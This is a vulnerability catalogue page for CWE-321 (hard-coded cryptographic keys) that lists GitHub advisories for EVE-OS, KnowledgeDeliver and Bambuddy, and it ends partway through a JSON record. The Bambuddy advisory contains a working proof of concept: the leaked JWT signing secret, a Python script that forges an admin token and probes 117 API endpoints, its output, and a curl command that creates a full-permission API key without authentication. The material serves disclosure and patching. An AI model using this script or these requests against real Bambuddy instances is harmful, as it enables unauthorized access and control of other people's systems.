CWE-321
AllowedUse of Hard-coded Cryptographic Key
Abstraction: Variant · Status: Draft
The product uses a hard-coded, unchangeable cryptographic key.
503 vulnerabilities reference this CWE, most recent first.
GHSA-G7VP-J25F-H34P
Vulnerability from github – Published: 2026-02-04 23:21 – Updated: 2026-02-04 23:21Impact
The deriveVaultKey function calls retrieveCloudKey which always returns "foobarfoobarfoobarfoobarfoobarfo". When merged with the randomly generated 32-byte key using mergeKeys (16 bytes from each), the last 16 bytes are always "arfoobarfoobarfo". This enables an attacker with physical access to the EVE-OS device to attempt to brute force the remaining 128 bits of key.
Patches
Fixed in 7.10 and 8.12.1-lts
Workarounds
None
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/lf-edge/eve"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20220310190112-c0c966dc31e2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-43637"
],
"database_specific": {
"cwe_ids": [
"CWE-321",
"CWE-798"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-04T23:21:25Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Impact\n\nThe deriveVaultKey function calls retrieveCloudKey which always returns \"foobarfoobarfoobarfoobarfoobarfo\". When merged with the randomly generated 32-byte key using mergeKeys (16 bytes from each), the last 16 bytes are always \"arfoobarfoobarfo\". This enables an attacker with physical access to the EVE-OS device to attempt to brute force the remaining 128 bits of key.\n\n### Patches\n\nFixed in 7.10 and 8.12.1-lts\n\n### Workarounds\n\nNone",
"id": "GHSA-g7vp-j25f-h34p",
"modified": "2026-02-04T23:21:25Z",
"published": "2026-02-04T23:21:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lf-edge/eve/security/advisories/GHSA-g7vp-j25f-h34p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43637"
},
{
"type": "WEB",
"url": "https://github.com/lf-edge/eve/commit/c0c966dc31e2ed9aafc155e6be646adb14756c01"
},
{
"type": "WEB",
"url": "https://asrg.io/security-advisories/cve-2023-43637"
},
{
"type": "WEB",
"url": "https://asrg.io/security-advisories/vault-key-partially-predetermined"
},
{
"type": "PACKAGE",
"url": "https://github.com/lf-edge/eve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "EVE Has Partially Predetermined Vault Key"
}
GHSA-G88C-8GFJ-6C98
Vulnerability from github – Published: 2026-04-16 18:31 – Updated: 2026-05-26 21:31Hard-coded ASP.NET/IIS machineKey value in Digital Knowledge KnowledgeDeliver deployments prior to February 24, 2026 allows adversaries to circumvent ViewState validation mechanisms and achieve remote code execution via malicious ViewState deserialization attacks
{
"affected": [],
"aliases": [
"CVE-2026-5426"
],
"database_specific": {
"cwe_ids": [
"CWE-321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-16T16:16:17Z",
"severity": "HIGH"
},
"details": "Hard-coded ASP.NET/IIS machineKey value in Digital Knowledge KnowledgeDeliver deployments prior to February 24, 2026 allows adversaries to circumvent ViewState validation mechanisms and achieve remote code execution via malicious ViewState deserialization attacks",
"id": "GHSA-g88c-8gfj-6c98",
"modified": "2026-05-26T21:31:37Z",
"published": "2026-04-16T18:31:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5426"
},
{
"type": "WEB",
"url": "https://cloud.google.com/blog/topics/threat-intelligence/knowledgedeliver-viewstate-deserialization-vulnerability"
},
{
"type": "WEB",
"url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2026/MNDT-2026-0009.md"
},
{
"type": "WEB",
"url": "https://www.digital-knowledge.co.jp/product/kd"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-GC24-PX2R-5QMF
Vulnerability from github – Published: 2026-02-02 21:21 – Updated: 2026-02-06 21:38Summary
- A hardcoded secret key used for signing JWTs is checked into source code
- ManyAPI routes do not check authentication
Details
I am using the publicly available docker image at ghcr.io/maziggy/bambuddy
1. Hardcoded JWT Secret Key
https://github.com/maziggy/bambuddy/blob/a9bb8ed8239602bf08a9914f85a09eeb2bf13d15/backend/app/core/auth.py#L28
Copying the Authorization token from a request via browser networking tools into JWT.io confirms the token is signed with this keyAny attacker can: 1. Forge valid JWT tokens for any user 2. Bypass authentication entirely 3. Gain full administrative access to any Bambuddy instance using the default key
Steps to Reproduce:
- Run an instance of BamBuddy
- Create admin user
- Forge and use JWT:
import jwt
import requests
token = jwt.encode({"sub": "admin", "exp": 9999999999}, "bambuddy-secret-key-change-in-production", algorithm="HS256")
resp = requests.get("http://10.0.0.4:8000/api/v1/system/info", headers={"Authorization": f"Bearer {token}"})
print(resp.status_code) # 200
print(resp.text) # {"app":{"version":"0.1.7b","base_dir":"/app/data","archive_dir":"/app/data/archive"},"database": ...
2. Most API Routes do not check Auth
While investigating the JWT forgery, I noticed that requests without Authorization headers still returned information for many endpoints:
resp = requests.get("http://10.0.0.4:8000/api/v1/system/info", headers={}) # Empty headers
print(resp.status_code) # 200
print(resp.text) # {"app":{"version":"0.1.7b","base_dir":"/app/data","archive_dir":"/app/data/archive"},"database": ...
Full Script and Output
Note: I do not have smart plugs or spoolman set up to verify actual behavior with those endpoints so they are excluded from this script.
Script to test GET endpoints with forged JWT and without any auth#!/usr/bin/env python3
"""
Proof of Concept: JWT Forgery via Hardcoded Secret Key (VULN-001)
For security research purposes only.
Tests all GET endpoints to identify which are accessible without authentication.
"""
import requests
import jwt
# Hardcoded secret from backend/app/core/auth.py:28
HARDCODED_SECRET = "bambuddy-secret-key-change-in-production"
TARGET = "http://10.0.0.4:8000"
API_PREFIX = "/api/v1"
# All GET endpoints organized by router
ENDPOINTS = {
"system": [
"/system/info",
],
"auth": [
"/auth/status",
"/auth/me",
],
"users": [
"/users",
"/users/1",
"/users/1/items-count",
],
"groups": [
"/groups",
"/groups/permissions",
"/groups/1",
],
"settings": [
"/settings",
"/settings/check-ffmpeg",
"/settings/spoolman",
"/settings/backup",
"/settings/virtual-printer/models",
"/settings/virtual-printer",
"/settings/mqtt/status",
],
"printers": [
"/printers/",
"/printers/usb-cameras",
"/printers/1",
"/printers/1/status",
"/printers/1/current-print-user",
"/printers/1/cover",
"/printers/1/files",
"/printers/1/storage",
"/printers/1/logging",
"/printers/1/slot-presets",
"/printers/1/slot-presets/1/1",
"/printers/1/print/objects",
"/printers/1/runtime-debug",
"/printers/1/camera/status",
"/printers/1/camera/test",
"/printers/1/camera/plate-detection/status",
"/printers/1/camera/plate-detection/references",
"/printers/1/kprofiles/",
"/printers/1/kprofiles/notes",
],
"archives": [
"/archives/",
"/archives/search",
"/archives/compare",
"/archives/analysis/failures",
"/archives/stats",
"/archives/tags",
"/archives/1",
"/archives/1/similar",
"/archives/1/duplicates",
"/archives/1/capabilities",
"/archives/1/gcode",
"/archives/1/plates",
"/archives/1/filament-requirements",
"/archives/1/project-page",
"/archives/1/source",
],
"filaments": [
"/filaments/",
"/filaments/1",
"/filaments/by-type/pla",
],
"cloud": [
"/cloud/status",
"/cloud/settings",
"/cloud/settings/1",
"/cloud/devices",
"/cloud/firmware-updates",
"/cloud/fields",
"/cloud/fields/print",
],
"queue": [
"/queue/",
"/queue/1",
],
"notifications": [
"/notifications/",
"/notifications/logs",
"/notifications/logs/stats",
"/notifications/1",
],
"notification_templates": [
"/notification-templates",
"/notification-templates/variables",
"/notification-templates/1",
],
"updates": [
"/updates/version",
"/updates/check",
"/updates/status",
],
"maintenance": [
"/maintenance/types",
"/maintenance/overview",
"/maintenance/summary",
"/maintenance/printers/1",
"/maintenance/items/1/history",
],
"external_links": [
"/external-links/",
"/external-links/1",
],
"projects": [
"/projects",
"/projects/templates",
"/projects/1",
"/projects/1/archives",
"/projects/1/queue",
"/projects/1/bom",
"/projects/1/timeline",
],
"library": [
"/library/folders",
"/library/folders/by-archive/1",
"/library/folders/by-project/1",
"/library/files",
"/library/stats",
"/library/folders/1",
"/library/files/1",
"/library/files/1/plates",
"/library/files/1/gcode",
"/library/files/1/filament-requirements",
],
"api_keys": [
"/api-keys/",
"/api-keys/1",
],
"webhook": [
"/webhook/printer/1/status",
"/webhook/queue",
],
"ams_history": [
"/ams-history/1/1",
],
"support": [
"/support/debug-logging",
"/support/logs",
],
"discovery": [
"/discovery/info",
"/discovery/status",
"/discovery/printers",
"/discovery/scan/status",
],
"pending_uploads": [
"/pending-uploads/",
"/pending-uploads/count",
"/pending-uploads/1",
],
"firmware": [
"/firmware/updates",
"/firmware/updates/1",
"/firmware/latest",
],
"github_backup": [
"/github-backup/config",
"/github-backup/status",
"/github-backup/logs",
],
"metrics": [
"/metrics",
],
}
def forge_token():
"""Forge a valid JWT token using the hardcoded secret."""
payload = {"sub": "admin", "exp": 9999999999}
return jwt.encode(payload, HARDCODED_SECRET, algorithm="HS256")
def test_endpoint(endpoint, headers):
"""Test a single endpoint and return status."""
try:
resp = requests.get(f"{TARGET}{API_PREFIX}{endpoint}", headers=headers, timeout=5)
return resp.status_code, resp.text[:100] if resp.status_code == 200 else None
except requests.RequestException as e:
return "ERROR", str(e)[:50]
def main():
token = forge_token()
print(f"[*] Forged JWT token:\n {token}\n")
# Test with no auth, then with forged JWT
test_modes = [
("NO AUTH", {}),
("FORGED JWT", {"Authorization": f"Bearer {token}"}),
]
results = {"no_auth": [], "jwt_only": [], "both_fail": []}
print(f"[*] Testing {sum(len(v) for v in ENDPOINTS.values())} endpoints against {TARGET}\n")
print("=" * 70)
for category, endpoints in ENDPOINTS.items():
print(f"\n[{category.upper()}]")
for endpoint in endpoints:
no_auth_status, _ = test_endpoint(endpoint, {})
jwt_status, preview = test_endpoint(endpoint, {"Authorization": f"Bearer {token}"})
if no_auth_status == 200:
results["no_auth"].append(endpoint)
print(f" {endpoint}: NO AUTH REQUIRED")
elif jwt_status == 200:
results["jwt_only"].append(endpoint)
print(f" {endpoint}: JWT WORKS")
else:
results["both_fail"].append((endpoint, no_auth_status, jwt_status))
print(f" {endpoint}: {no_auth_status} / {jwt_status}")
# Summary
print("\n" + "=" * 70)
print("\n[SUMMARY]\n")
print(f"Endpoints accessible WITHOUT authentication ({len(results['no_auth'])}):")
for ep in results["no_auth"]:
print(f" - {ep}")
print(f"\nEndpoints accessible with FORGED JWT only ({len(results['jwt_only'])}):")
for ep in results["jwt_only"]:
print(f" - {ep}")
print(f"\nEndpoints that rejected both ({len(results['both_fail'])}):")
for ep, no_auth, jwt_auth in results["both_fail"]:
print(f" - {ep} (no_auth: {no_auth}, jwt: {jwt_auth})")
if __name__ == "__main__":
main()
Script output
[*] Forged JWT token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJzcGVlbmFoIiwiZXhwIjo5OTk5OTk5OTk5fQ.xeUmpf4PkhI7jHHGBPLWQEQQ4GTiiUOENeQkPpvNMnA
[*] Testing 117 endpoints against http://10.0.0.4:8000
======================================================================
[SYSTEM]
/system/info: NO AUTH REQUIRED
[AUTH]
/auth/status: NO AUTH REQUIRED
/auth/me: JWT WORKS
[USERS]
/users: JWT WORKS
/users/1: JWT WORKS
/users/1/items-count: JWT WORKS
[GROUPS]
/groups: JWT WORKS
/groups/permissions: JWT WORKS
/groups/1: JWT WORKS
[SETTINGS]
/settings: NO AUTH REQUIRED
/settings/check-ffmpeg: NO AUTH REQUIRED
/settings/spoolman: NO AUTH REQUIRED
/settings/backup: NO AUTH REQUIRED
/settings/virtual-printer/models: NO AUTH REQUIRED
/settings/virtual-printer: NO AUTH REQUIRED
/settings/mqtt/status: NO AUTH REQUIRED
[PRINTERS]
/printers/: JWT WORKS
/printers/usb-cameras: JWT WORKS
/printers/1: JWT WORKS
/printers/1/status: JWT WORKS
/printers/1/current-print-user: JWT WORKS
/printers/1/cover: JWT WORKS
/printers/1/files: JWT WORKS
/printers/1/storage: JWT WORKS
/printers/1/logging: JWT WORKS
/printers/1/slot-presets: JWT WORKS
/printers/1/slot-presets/1/1: JWT WORKS
/printers/1/print/objects: JWT WORKS
/printers/1/runtime-debug: JWT WORKS
/printers/1/camera/status: NO AUTH REQUIRED
/printers/1/camera/test: ERROR / ERROR
/printers/1/camera/plate-detection/status: NO AUTH REQUIRED
/printers/1/camera/plate-detection/references: NO AUTH REQUIRED
/printers/1/kprofiles/: ERROR / ERROR
/printers/1/kprofiles/notes: NO AUTH REQUIRED
[ARCHIVES]
/archives/: NO AUTH REQUIRED
/archives/search: 422 / 422
/archives/compare: 422 / 422
/archives/analysis/failures: NO AUTH REQUIRED
/archives/stats: NO AUTH REQUIRED
/archives/tags: NO AUTH REQUIRED
/archives/1: NO AUTH REQUIRED
/archives/1/similar: NO AUTH REQUIRED
/archives/1/duplicates: NO AUTH REQUIRED
/archives/1/capabilities: NO AUTH REQUIRED
/archives/1/gcode: NO AUTH REQUIRED
/archives/1/plates: NO AUTH REQUIRED
/archives/1/filament-requirements: NO AUTH REQUIRED
/archives/1/project-page: NO AUTH REQUIRED
/archives/1/source: 404 / 404
[FILAMENTS]
/filaments/: NO AUTH REQUIRED
/filaments/1: NO AUTH REQUIRED
/filaments/by-type/pla: NO AUTH REQUIRED
[CLOUD]
/cloud/status: NO AUTH REQUIRED
/cloud/settings: 401 / 401
/cloud/settings/1: 401 / 401
/cloud/devices: 401 / 401
/cloud/firmware-updates: 401 / 401
/cloud/fields: NO AUTH REQUIRED
/cloud/fields/print: NO AUTH REQUIRED
[QUEUE]
/queue/: NO AUTH REQUIRED
/queue/1: 404 / 404
[NOTIFICATIONS]
/notifications/: NO AUTH REQUIRED
/notifications/logs: NO AUTH REQUIRED
/notifications/logs/stats: NO AUTH REQUIRED
/notifications/1: 404 / 404
[NOTIFICATION_TEMPLATES]
/notification-templates: NO AUTH REQUIRED
/notification-templates/variables: NO AUTH REQUIRED
/notification-templates/1: NO AUTH REQUIRED
[UPDATES]
/updates/version: NO AUTH REQUIRED
/updates/check: NO AUTH REQUIRED
/updates/status: NO AUTH REQUIRED
[MAINTENANCE]
/maintenance/types: NO AUTH REQUIRED
/maintenance/overview: NO AUTH REQUIRED
/maintenance/summary: NO AUTH REQUIRED
/maintenance/printers/1: NO AUTH REQUIRED
/maintenance/items/1/history: NO AUTH REQUIRED
[EXTERNAL_LINKS]
/external-links/: NO AUTH REQUIRED
/external-links/1: 404 / 404
[PROJECTS]
/projects: NO AUTH REQUIRED
/projects/templates: NO AUTH REQUIRED
/projects/1: NO AUTH REQUIRED
/projects/1/archives: NO AUTH REQUIRED
/projects/1/queue: NO AUTH REQUIRED
/projects/1/bom: NO AUTH REQUIRED
/projects/1/timeline: NO AUTH REQUIRED
[LIBRARY]
/library/folders: NO AUTH REQUIRED
/library/folders/by-archive/1: NO AUTH REQUIRED
/library/folders/by-project/1: NO AUTH REQUIRED
/library/files: NO AUTH REQUIRED
/library/stats: NO AUTH REQUIRED
/library/folders/1: NO AUTH REQUIRED
/library/files/1: 404 / 404
/library/files/1/plates: 404 / 404
/library/files/1/gcode: 404 / 404
/library/files/1/filament-requirements: 404 / 404
[API_KEYS]
/api-keys/: NO AUTH REQUIRED
/api-keys/1: NO AUTH REQUIRED
[WEBHOOK]
/webhook/printer/1/status: 401 / 401
/webhook/queue: 401 / 401
[AMS_HISTORY]
/ams-history/1/1: NO AUTH REQUIRED
[SUPPORT]
/support/debug-logging: NO AUTH REQUIRED
/support/logs: NO AUTH REQUIRED
[DISCOVERY]
/discovery/info: NO AUTH REQUIRED
/discovery/status: NO AUTH REQUIRED
/discovery/printers: NO AUTH REQUIRED
/discovery/scan/status: NO AUTH REQUIRED
[PENDING_UPLOADS]
/pending-uploads/: NO AUTH REQUIRED
/pending-uploads/count: NO AUTH REQUIRED
/pending-uploads/1: 404 / 404
[FIRMWARE]
/firmware/updates: NO AUTH REQUIRED
/firmware/updates/1: NO AUTH REQUIRED
/firmware/latest: NO AUTH REQUIRED
[GITHUB_BACKUP]
/github-backup/config: NO AUTH REQUIRED
/github-backup/status: NO AUTH REQUIRED
/github-backup/logs: NO AUTH REQUIRED
[METRICS]
/metrics: 401 / 401
======================================================================
[SUMMARY]
Endpoints accessible WITHOUT authentication (77):
- /system/info
- /auth/status
- /settings
- /settings/check-ffmpeg
- /settings/spoolman
- /settings/backup
- /settings/virtual-printer/models
- /settings/virtual-printer
- /settings/mqtt/status
- /printers/1/camera/status
- /printers/1/camera/plate-detection/status
- /printers/1/camera/plate-detection/references
- /printers/1/kprofiles/notes
- /archives/
- /archives/analysis/failures
- /archives/stats
- /archives/tags
- /archives/1
- /archives/1/similar
- /archives/1/duplicates
- /archives/1/capabilities
- /archives/1/gcode
- /archives/1/plates
- /archives/1/filament-requirements
- /archives/1/project-page
- /filaments/
- /filaments/1
- /filaments/by-type/pla
- /cloud/status
- /cloud/fields
- /cloud/fields/print
- /queue/
- /notifications/
- /notifications/logs
- /notifications/logs/stats
- /notification-templates
- /notification-templates/variables
- /notification-templates/1
- /updates/version
- /updates/check
- /updates/status
- /maintenance/types
- /maintenance/overview
- /maintenance/summary
- /maintenance/printers/1
- /maintenance/items/1/history
- /external-links/
- /projects
- /projects/templates
- /projects/1
- /projects/1/archives
- /projects/1/queue
- /projects/1/bom
- /projects/1/timeline
- /library/folders
- /library/folders/by-archive/1
- /library/folders/by-project/1
- /library/files
- /library/stats
- /library/folders/1
- /api-keys/
- /api-keys/1
- /ams-history/1/1
- /support/debug-logging
- /support/logs
- /discovery/info
- /discovery/status
- /discovery/printers
- /discovery/scan/status
- /pending-uploads/
- /pending-uploads/count
- /firmware/updates
- /firmware/updates/1
- /firmware/latest
- /github-backup/config
- /github-backup/status
- /github-backup/logs
Endpoints accessible with FORGED JWT only (20):
- /auth/me
- /users
- /users/1
- /users/1/items-count
- /groups
- /groups/permissions
- /groups/1
- /printers/
- /printers/usb-cameras
- /printers/1
- /printers/1/status
- /printers/1/current-print-user
- /printers/1/cover
- /printers/1/files
- /printers/1/storage
- /printers/1/logging
- /printers/1/slot-presets
- /printers/1/slot-presets/1/1
- /printers/1/print/objects
- /printers/1/runtime-debug
Endpoints that rejected both (20):
- /printers/1/camera/test (no_auth: ERROR, jwt: ERROR)
- /printers/1/kprofiles/ (no_auth: ERROR, jwt: ERROR)
- /archives/search (no_auth: 422, jwt: 422)
- /archives/compare (no_auth: 422, jwt: 422)
- /archives/1/source (no_auth: 404, jwt: 404)
- /cloud/settings (no_auth: 401, jwt: 401)
- /cloud/settings/1 (no_auth: 401, jwt: 401)
- /cloud/devices (no_auth: 401, jwt: 401)
- /cloud/firmware-updates (no_auth: 401, jwt: 401)
- /queue/1 (no_auth: 404, jwt: 404)
- /notifications/1 (no_auth: 404, jwt: 404)
- /external-links/1 (no_auth: 404, jwt: 404)
- /library/files/1 (no_auth: 404, jwt: 404)
- /library/files/1/plates (no_auth: 404, jwt: 404)
- /library/files/1/gcode (no_auth: 404, jwt: 404)
- /library/files/1/filament-requirements (no_auth: 404, jwt: 404)
- /webhook/printer/1/status (no_auth: 401, jwt: 401)
- /webhook/queue (no_auth: 401, jwt: 401)
- /pending-uploads/1 (no_auth: 404, jwt: 404)
- /metrics (no_auth: 401, jwt: 401)
While this script only tests the GET endpoints, these vulnerabilities are not exclusive to GET endpoints. The GET endpoints were easiest to script since they generally don't require many parameters, but other methods still appear vulnerable. I manually tested POST /api/v1/api-keys/ and was able to create a new API key with all permissions without auth:
curl 'http://10.0.0.4:8000/api/v1/api-keys/' -X POST -H 'Content-Type: application/json' --data-raw '{"name":"new key","can_queue":true,"can_control_printer":true,"can_read_status":true}'
yields
{"id":7,"name":"new key","key_prefix":"bb_QW2su...","can_queue":true,"can_control_printer":true,"can_read_status":true,"printer_ids":null,"enabled":true,"last_used":null,"created_at":"2026-02-01T23:14:15","expires_at":null,"key":"bb_QW2suZVIHiUbadSyyAMrnmf0zFhDG5e9BSVBvb4ZN-w"}
Impact
BamBuddy is vulnerable to unauthorized access and control
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "bambuddy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25505"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-02T21:21:14Z",
"nvd_published_at": "2026-02-04T20:16:07Z",
"severity": "CRITICAL"
},
"details": "### Summary\n1. A hardcoded secret key used for signing JWTs is checked into source code\n2. ManyAPI routes do not check authentication\n\n### Details\nI am using the publicly available docker image at `ghcr.io/maziggy/bambuddy`\n#### 1. Hardcoded JWT Secret Key\nhttps://github.com/maziggy/bambuddy/blob/a9bb8ed8239602bf08a9914f85a09eeb2bf13d15/backend/app/core/auth.py#L28\n\n\u003cdetails\u003e\n\u003csummary\u003eCopying the Authorization token from a request via browser networking tools into JWT.io confirms the token is signed with this key\u003c/summary\u003e\n\n\u003cimg width=\"1591\" height=\"937\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fd6e805a-9380-438f-a412-623660fa3f5a\" /\u003e\n\n\u003c/details\u003e\n\nAny attacker can:\n1. Forge valid JWT tokens for any user\n2. Bypass authentication entirely\n3. Gain full administrative access to any Bambuddy instance using the default key\n\n**Steps to Reproduce:**\n\n1. Run an instance of BamBuddy\n2. Create admin user\n3. Forge and use JWT:\n```python\nimport jwt\nimport requests\n\ntoken = jwt.encode({\"sub\": \"admin\", \"exp\": 9999999999}, \"bambuddy-secret-key-change-in-production\", algorithm=\"HS256\")\nresp = requests.get(\"http://10.0.0.4:8000/api/v1/system/info\", headers={\"Authorization\": f\"Bearer {token}\"})\n\nprint(resp.status_code) # 200\nprint(resp.text) # {\"app\":{\"version\":\"0.1.7b\",\"base_dir\":\"/app/data\",\"archive_dir\":\"/app/data/archive\"},\"database\": ...\n```\n\n#### 2. Most API Routes do not check Auth\nWhile investigating the JWT forgery, I noticed that requests without `Authorization` headers still returned information for many endpoints:\n```python\nresp = requests.get(\"http://10.0.0.4:8000/api/v1/system/info\", headers={}) # Empty headers\n\nprint(resp.status_code) # 200\nprint(resp.text) # {\"app\":{\"version\":\"0.1.7b\",\"base_dir\":\"/app/data\",\"archive_dir\":\"/app/data/archive\"},\"database\": ...\n```\n\n#### Full Script and Output\n\nNote: I do not have smart plugs or spoolman set up to verify actual behavior with those endpoints so they are excluded from this script.\n\n\u003cdetails\u003e\n\u003csummary\u003eScript to test GET endpoints with forged JWT and without any auth\u003c/summary\u003e\n\n```python3\n#!/usr/bin/env python3\n\"\"\"\nProof of Concept: JWT Forgery via Hardcoded Secret Key (VULN-001)\nFor security research purposes only.\n\nTests all GET endpoints to identify which are accessible without authentication.\n\"\"\"\n\nimport requests\nimport jwt\n\n# Hardcoded secret from backend/app/core/auth.py:28\nHARDCODED_SECRET = \"bambuddy-secret-key-change-in-production\"\nTARGET = \"http://10.0.0.4:8000\"\nAPI_PREFIX = \"/api/v1\"\n\n# All GET endpoints organized by router\nENDPOINTS = {\n \"system\": [\n \"/system/info\",\n ],\n \"auth\": [\n \"/auth/status\",\n \"/auth/me\",\n ],\n \"users\": [\n \"/users\",\n \"/users/1\",\n \"/users/1/items-count\",\n ],\n \"groups\": [\n \"/groups\",\n \"/groups/permissions\",\n \"/groups/1\",\n ],\n \"settings\": [\n \"/settings\",\n \"/settings/check-ffmpeg\",\n \"/settings/spoolman\",\n \"/settings/backup\",\n \"/settings/virtual-printer/models\",\n \"/settings/virtual-printer\",\n \"/settings/mqtt/status\",\n ],\n \"printers\": [\n \"/printers/\",\n \"/printers/usb-cameras\",\n \"/printers/1\",\n \"/printers/1/status\",\n \"/printers/1/current-print-user\",\n \"/printers/1/cover\",\n \"/printers/1/files\",\n \"/printers/1/storage\",\n \"/printers/1/logging\",\n \"/printers/1/slot-presets\",\n \"/printers/1/slot-presets/1/1\",\n \"/printers/1/print/objects\",\n \"/printers/1/runtime-debug\",\n \"/printers/1/camera/status\",\n \"/printers/1/camera/test\",\n \"/printers/1/camera/plate-detection/status\",\n \"/printers/1/camera/plate-detection/references\",\n \"/printers/1/kprofiles/\",\n \"/printers/1/kprofiles/notes\",\n ],\n \"archives\": [\n \"/archives/\",\n \"/archives/search\",\n \"/archives/compare\",\n \"/archives/analysis/failures\",\n \"/archives/stats\",\n \"/archives/tags\",\n \"/archives/1\",\n \"/archives/1/similar\",\n \"/archives/1/duplicates\",\n \"/archives/1/capabilities\",\n \"/archives/1/gcode\",\n \"/archives/1/plates\",\n \"/archives/1/filament-requirements\",\n \"/archives/1/project-page\",\n \"/archives/1/source\",\n ],\n \"filaments\": [\n \"/filaments/\",\n \"/filaments/1\",\n \"/filaments/by-type/pla\",\n ],\n \"cloud\": [\n \"/cloud/status\",\n \"/cloud/settings\",\n \"/cloud/settings/1\",\n \"/cloud/devices\",\n \"/cloud/firmware-updates\",\n \"/cloud/fields\",\n \"/cloud/fields/print\",\n ],\n \"queue\": [\n \"/queue/\",\n \"/queue/1\",\n ],\n \"notifications\": [\n \"/notifications/\",\n \"/notifications/logs\",\n \"/notifications/logs/stats\",\n \"/notifications/1\",\n ],\n \"notification_templates\": [\n \"/notification-templates\",\n \"/notification-templates/variables\",\n \"/notification-templates/1\",\n ],\n \"updates\": [\n \"/updates/version\",\n \"/updates/check\",\n \"/updates/status\",\n ],\n \"maintenance\": [\n \"/maintenance/types\",\n \"/maintenance/overview\",\n \"/maintenance/summary\",\n \"/maintenance/printers/1\",\n \"/maintenance/items/1/history\",\n ],\n \"external_links\": [\n \"/external-links/\",\n \"/external-links/1\",\n ],\n \"projects\": [\n \"/projects\",\n \"/projects/templates\",\n \"/projects/1\",\n \"/projects/1/archives\",\n \"/projects/1/queue\",\n \"/projects/1/bom\",\n \"/projects/1/timeline\",\n ],\n \"library\": [\n \"/library/folders\",\n \"/library/folders/by-archive/1\",\n \"/library/folders/by-project/1\",\n \"/library/files\",\n \"/library/stats\",\n \"/library/folders/1\",\n \"/library/files/1\",\n \"/library/files/1/plates\",\n \"/library/files/1/gcode\",\n \"/library/files/1/filament-requirements\",\n ],\n \"api_keys\": [\n \"/api-keys/\",\n \"/api-keys/1\",\n ],\n \"webhook\": [\n \"/webhook/printer/1/status\",\n \"/webhook/queue\",\n ],\n \"ams_history\": [\n \"/ams-history/1/1\",\n ],\n \"support\": [\n \"/support/debug-logging\",\n \"/support/logs\",\n ],\n \"discovery\": [\n \"/discovery/info\",\n \"/discovery/status\",\n \"/discovery/printers\",\n \"/discovery/scan/status\",\n ],\n \"pending_uploads\": [\n \"/pending-uploads/\",\n \"/pending-uploads/count\",\n \"/pending-uploads/1\",\n ],\n \"firmware\": [\n \"/firmware/updates\",\n \"/firmware/updates/1\",\n \"/firmware/latest\",\n ],\n \"github_backup\": [\n \"/github-backup/config\",\n \"/github-backup/status\",\n \"/github-backup/logs\",\n ],\n \"metrics\": [\n \"/metrics\",\n ],\n}\n\n\ndef forge_token():\n \"\"\"Forge a valid JWT token using the hardcoded secret.\"\"\"\n payload = {\"sub\": \"admin\", \"exp\": 9999999999}\n return jwt.encode(payload, HARDCODED_SECRET, algorithm=\"HS256\")\n\n\ndef test_endpoint(endpoint, headers):\n \"\"\"Test a single endpoint and return status.\"\"\"\n try:\n resp = requests.get(f\"{TARGET}{API_PREFIX}{endpoint}\", headers=headers, timeout=5)\n return resp.status_code, resp.text[:100] if resp.status_code == 200 else None\n except requests.RequestException as e:\n return \"ERROR\", str(e)[:50]\n\n\ndef main():\n token = forge_token()\n print(f\"[*] Forged JWT token:\\n {token}\\n\")\n\n # Test with no auth, then with forged JWT\n test_modes = [\n (\"NO AUTH\", {}),\n (\"FORGED JWT\", {\"Authorization\": f\"Bearer {token}\"}),\n ]\n\n results = {\"no_auth\": [], \"jwt_only\": [], \"both_fail\": []}\n\n print(f\"[*] Testing {sum(len(v) for v in ENDPOINTS.values())} endpoints against {TARGET}\\n\")\n print(\"=\" * 70)\n\n for category, endpoints in ENDPOINTS.items():\n print(f\"\\n[{category.upper()}]\")\n\n for endpoint in endpoints:\n no_auth_status, _ = test_endpoint(endpoint, {})\n jwt_status, preview = test_endpoint(endpoint, {\"Authorization\": f\"Bearer {token}\"})\n\n if no_auth_status == 200:\n results[\"no_auth\"].append(endpoint)\n print(f\" {endpoint}: NO AUTH REQUIRED\")\n elif jwt_status == 200:\n results[\"jwt_only\"].append(endpoint)\n print(f\" {endpoint}: JWT WORKS\")\n else:\n results[\"both_fail\"].append((endpoint, no_auth_status, jwt_status))\n print(f\" {endpoint}: {no_auth_status} / {jwt_status}\")\n\n # Summary\n print(\"\\n\" + \"=\" * 70)\n print(\"\\n[SUMMARY]\\n\")\n\n print(f\"Endpoints accessible WITHOUT authentication ({len(results[\u0027no_auth\u0027])}):\")\n for ep in results[\"no_auth\"]:\n print(f\" - {ep}\")\n\n print(f\"\\nEndpoints accessible with FORGED JWT only ({len(results[\u0027jwt_only\u0027])}):\")\n for ep in results[\"jwt_only\"]:\n print(f\" - {ep}\")\n\n print(f\"\\nEndpoints that rejected both ({len(results[\u0027both_fail\u0027])}):\")\n for ep, no_auth, jwt_auth in results[\"both_fail\"]:\n print(f\" - {ep} (no_auth: {no_auth}, jwt: {jwt_auth})\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003eScript output\u003c/summary\u003e\n\n```\n[*] Forged JWT token:\n 